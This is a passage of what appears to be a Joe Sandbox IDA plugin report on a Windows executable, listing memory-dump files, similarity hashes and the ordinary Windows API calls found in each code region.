    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
    • String ID: CMT
    • API String ID: 1206968400-2756464174
    • Opcode ID: 4935dc2e967ed677b246140ac868ce95462817c6a9adefbf7a9a0561c759c99a
    • Instruction ID: 9315703b8f8b968b76129a75af65d192c550ec6ccb2b49669bacdc7d9aef7f25
    • Opcode Fuzzy Hash: 4935dc2e967ed677b246140ac868ce95462817c6a9adefbf7a9a0561c759c99a
    • Instruction Fuzzy Hash: C56228B16002848FDF29DF38C8956E97BE1AF55304F08457EFC5A8B283DB74AA49CB54
    APIs
    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00060A06
    • IsDebuggerPresent.KERNEL32 ref: 00060AD2
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00060AF2
    • UnhandledExceptionFilter.KERNEL32(?), ref: 00060AFC
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
    • String ID:
    • API String ID: 254469556-0
    • Opcode ID: 22df2a543b160edae3aa8e80462fcd97616ffccdff6faa4981c5710a9f3d9ab9
    • Instruction ID: 325ccc88757a9feb2900e6b30a15c6b2b78dbacb7009037be7be7ff17b21fd24
    • Opcode Fuzzy Hash: 22df2a543b160edae3aa8e80462fcd97616ffccdff6faa4981c5710a9f3d9ab9
    • Instruction Fuzzy Hash: 45313875D4121C9BEB20EFA4DD89BCDBBB8AF08304F1041EAE40CAB251EB755A848F04
    APIs
    • VirtualQuery.KERNEL32(80000000,0005F764,0000001C,0005F959,00000000,?,?,?,?,?,?,?,0005F764,00000004,000A3D24,0005F9E9), ref: 0005F830
    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0005F764,00000004,000A3D24,0005F9E9), ref: 0005F84B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: InfoQuerySystemVirtual
    • String ID: D
    • API String ID: 401686933-2746444292
    • Opcode ID: 59c63c16f08c2e9e4020875954ad36647ccd1ee777671ebd8a486c0857da831c
    • Instruction ID: 892294a54bf2f462f8dd2364cd6ba8aeb97d10d621922a677e113ff80374bbd8
    • Opcode Fuzzy Hash: 59c63c16f08c2e9e4020875954ad36647ccd1ee777671ebd8a486c0857da831c
    • Instruction Fuzzy Hash: C101B172A001096BDB14EE29DC05ABE7BE9EFD4325F08C234AD19D7254EA38D946C680
    APIs
    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 000650D7
    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 000650E1
    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 000650EE
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ExceptionFilterUnhandled$DebuggerPresent
    • String ID:
    • API String ID: 3906539128-0
    • Opcode ID: 0b270cee6ba12bc71f7c2b3635ddba8af0fdbbd7a01b93009ae1fc62b39a3ee0
    • Instruction ID: df8368174da677ddd1d838daa2aea50d149590597c2bc402dc6f283393955ac3
    • Opcode Fuzzy Hash: 0b270cee6ba12bc71f7c2b3635ddba8af0fdbbd7a01b93009ae1fc62b39a3ee0
    • Instruction Fuzzy Hash: 5F31A3749412189BDB61DF64DC897DDBBB4AF18310F5041DAE80CA7251EB749B858F44
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID: .
    • API String ID: 0-248832578
    • Opcode ID: 7cd4e41063da529f520b3ee435ca300a88f80e0bebfa27596f9c404686953106
    • Instruction ID: 05ec1d3a0c97294b252375d8dee2962598f918f1fd576d367f64e8df03057bb9
    • Opcode Fuzzy Hash: 7cd4e41063da529f520b3ee435ca300a88f80e0bebfa27596f9c404686953106
    • Instruction Fuzzy Hash: 3C31F8719002496FEB649E78CC84EFB7BFEDF85314F140198F55AD7252E630AE858B50
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: d08e2bcb8369247a90beecc4ac2937ecc20121a35f50d3dd5c946701bfc99d8e
    • Instruction ID: 93073dcee0de2d8c8bce0e0f76d1fbdd284f0eabaa1468bafdda8311d87460a9
    • Opcode Fuzzy Hash: d08e2bcb8369247a90beecc4ac2937ecc20121a35f50d3dd5c946701bfc99d8e
    • Instruction Fuzzy Hash: 48022C75E002199FDF54CFA9C8806AEBBF6FF48314F258169D819EB385D731AE418B90
    APIs
    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0005C0A9
    • GetNumberFormatW.KERNEL32(00000400,00000000,?,0008072C,?,?), ref: 0005C0F8
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: FormatInfoLocaleNumber
    • String ID:
    • API String ID: 2169056816-0
    • Opcode ID: 88e08a35c4a07f3c6a24ac36b043ab9a7a4e1b97f1e8a94362d1e1adc4c4f4ae
    • Instruction ID: af8001a78ec187a7aa89018519ee5656d9115e99227c3b1fe0e3ffe685f68c2f
    • Opcode Fuzzy Hash: 88e08a35c4a07f3c6a24ac36b043ab9a7a4e1b97f1e8a94362d1e1adc4c4f4ae
    • Instruction Fuzzy Hash: 18011A36540318AAE7109BA4EC45FDB77BCFF19720F405422FA05A7191E378A958CBA5
    APIs
    • GetLastError.KERNEL32(00047886,?,00000400), ref: 00047727
    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00047748
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ErrorFormatLastMessage
    • String ID:
    • API String ID: 3479602957-0
    • Opcode ID: 274adc89450374daaefc6d294f6462b9d5eccc1d90be6a9901c809027ae0a6ef
    • Instruction ID: afb1f8c6121520eb503090117684823cd67098b2c79df9799d798f4a06d31aba
    • Opcode Fuzzy Hash: 274adc89450374daaefc6d294f6462b9d5eccc1d90be6a9901c809027ae0a6ef
    • Instruction Fuzzy Hash: E9D05271248300BAFA100B205C0AF2A2799BB00B41F108024B308A80E0D7789060A628
    APIs
    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00072B9F,?,?,00000008,?,?,0007283F,00000000), ref: 00072DD1
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ExceptionRaise
    • String ID:
    • API String ID: 3997070919-0
    • Opcode ID: f3c0adc2b40870c7dbe166c6b438be3161a1e2d8bcf356e08fb0c2c3bd154708
    • Instruction ID: e9cc5803bd289b2aa1fba24b36a92339e0df1f0bd285eff9e1745e2cc1357543
    • Opcode Fuzzy Hash: f3c0adc2b40870c7dbe166c6b438be3161a1e2d8bcf356e08fb0c2c3bd154708
    • Instruction Fuzzy Hash: 33B13B31A10608DFD765CF28C48AB697BE0FF45364F25C658E99ACF2A1C339E991CB44
    APIs
    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0006082C
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: FeaturePresentProcessor
    • String ID:
    • API String ID: 2325560087-0
    • Opcode ID: ef8b39621595eb9868c601063483d9d873f38565175729b9ee5f4be361b99b30
    • Instruction ID: 2229941935d2f9cc913ebf68828f7e0c564a195d8636fd3ef5a369a36a2bbf99
    • Opcode Fuzzy Hash: ef8b39621595eb9868c601063483d9d873f38565175729b9ee5f4be361b99b30
    • Instruction Fuzzy Hash: 4F5169B1E54615CFEB54CF64E8857AEBBF2FB48310F24842AD445EB2A1D7789940CFA0
    APIs
    • GetVersionExW.KERNEL32(?), ref: 0004C388
      • Part of subcall function 0004C3F7: __EH_prolog.LIBCMT ref: 0004C3FC
      • Part of subcall function 0004C3F7: CoCreateInstance.COMBASE(000768A0,00000000,00000001,000767D0,?), ref: 0004C41E
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: CreateH_prologInstanceVersion
    • String ID:
    • API String ID: 511865808-0
    • Opcode ID: b3d5f4dc4bb786d52cfdb508c1646f9a5cf15e220f225464715869e5f4956e0e
    • Instruction ID: c5e00bf22c4058ca18543e6bf6994c6598bfe5693e0a22302440d2b51f43c9f5
    • Opcode Fuzzy Hash: b3d5f4dc4bb786d52cfdb508c1646f9a5cf15e220f225464715869e5f4956e0e
    • Instruction Fuzzy Hash: 7CF0AEB090628C8BFFA5DF60A8197D837E4571170AF0481E5C1C052153D3B95BC5DF7A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID: gj
    • API String ID: 0-4203073231
    • Opcode ID: 74292383cfc94c87c98b6a672e1bea4064e043574c4dda1b17590f3726c4a466
    • Instruction ID: 9e496bc2aebaf11641d1ad54ee3afacb3a9303d099cd51e5fd1860c12a349d30
    • Opcode Fuzzy Hash: 74292383cfc94c87c98b6a672e1bea4064e043574c4dda1b17590f3726c4a466
    • Instruction Fuzzy Hash: A9C137B2A183818FC754CF29D88065AFBE1BFC9308F19892DE998D7301D774E945CB96
    APIs
    • SetUnhandledExceptionFilter.KERNEL32(Function_00020BA0,000605F5), ref: 00060B92
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ExceptionFilterUnhandled
    • String ID:
    • API String ID: 3192549508-0
    • Opcode ID: 964f45a0c9b5822250ca4ab369aea16cc5a46108f9a816e05499f09612562224
    • Instruction ID: 42adbb7d59e565f07aa8472cd5d6fe0129eff76d09096a96030a8c42935197c1
    • Opcode Fuzzy Hash: 964f45a0c9b5822250ca4ab369aea16cc5a46108f9a816e05499f09612562224
    • Instruction Fuzzy Hash:
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: HeapProcess
    • String ID:
    • API String ID: 54951025-0
    • Opcode ID: 233aa3935aeb6e3bc9c2612704e5aabb84fad791b33b1771d2c25e70c645c3de
    • Instruction ID: 1d48c8b7e008e315393694275995e67651a66b91414659644fbac660a9844651
    • Opcode Fuzzy Hash: 233aa3935aeb6e3bc9c2612704e5aabb84fad791b33b1771d2c25e70c645c3de
    • Instruction Fuzzy Hash: 9EA01130A022808BA3008F3AAA0820C3AA8AB832803008028A008C0230EB2C80A08A02
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 2d6d7b90b0f167eb106e84e75b72c36f6dee5b774374e5313e1240face5eb564
    • Instruction ID: dd875abbbebf7334932006d39b9c1234c4d77b081b751a16bf8a4866dafdd989
    • Opcode Fuzzy Hash: 2d6d7b90b0f167eb106e84e75b72c36f6dee5b774374e5313e1240face5eb564
    • Instruction Fuzzy Hash: BF620671608B858FCB29CF38D4906FA7BE1AF95305F18896DDD9E8B342D730A949DB10
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: ceb54f0b1270e70b00e006b9306f911088e896e5099abdc2083c34249c5c05d7
    • Instruction ID: 51d9c2500d3d26a17f4c9fa5170b32aaee7495a02f1b78f4622cfee73b8d3b97
    • Opcode Fuzzy Hash: ceb54f0b1270e70b00e006b9306f911088e896e5099abdc2083c34249c5c05d7
    • Instruction Fuzzy Hash: 6562F371608285DFCB18CF28C4905BABBE1BF95305F08C66DEC9A9B346DB30E949DB51
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: bd9e78f3eedb31a401d47d299b8af698bf32d54c623d11bd157ec233ddef8b59
    • Instruction ID: 360215021af0b230c8343d87ebc03e56bc95c7f790d6035b67a57f6fe8af0972
    • Opcode Fuzzy Hash: bd9e78f3eedb31a401d47d299b8af698bf32d54c623d11bd157ec233ddef8b59
    • Instruction Fuzzy Hash: 00525B726187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B245D734EA19CB86
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 91e8c2cc69bb689b9757d067713bada0ef27a17d8b9a395615b8b6fda0309fb8
    • Instruction ID: b398232fe46c768332aef25bf3ef9f89327c6bbec91a1f08d432ce9daf2277c5
    • Opcode Fuzzy Hash: 91e8c2cc69bb689b9757d067713bada0ef27a17d8b9a395615b8b6fda0309fb8
    • Instruction Fuzzy Hash: E712D1B16047068FC728CF28C4947BAB7E0FB54305F10892DED9AD7681EB78E999CB05
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: fa6659a1e80d34610ff060634c4cde721c7bdc45dd0b1bce4e52126885a01a9b
    • Instruction ID: 48bc1e87ac7c72e7b574885b9d47c89532fd52224a02ae2151723cd6754e8bd8
    • Opcode Fuzzy Hash: fa6659a1e80d34610ff060634c4cde721c7bdc45dd0b1bce4e52126885a01a9b
    • Instruction Fuzzy Hash: E4F1A9B1A083018FC764DF28C484A6EBBE5FFC9318F144A6EF4D597252D630E945CB4A
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
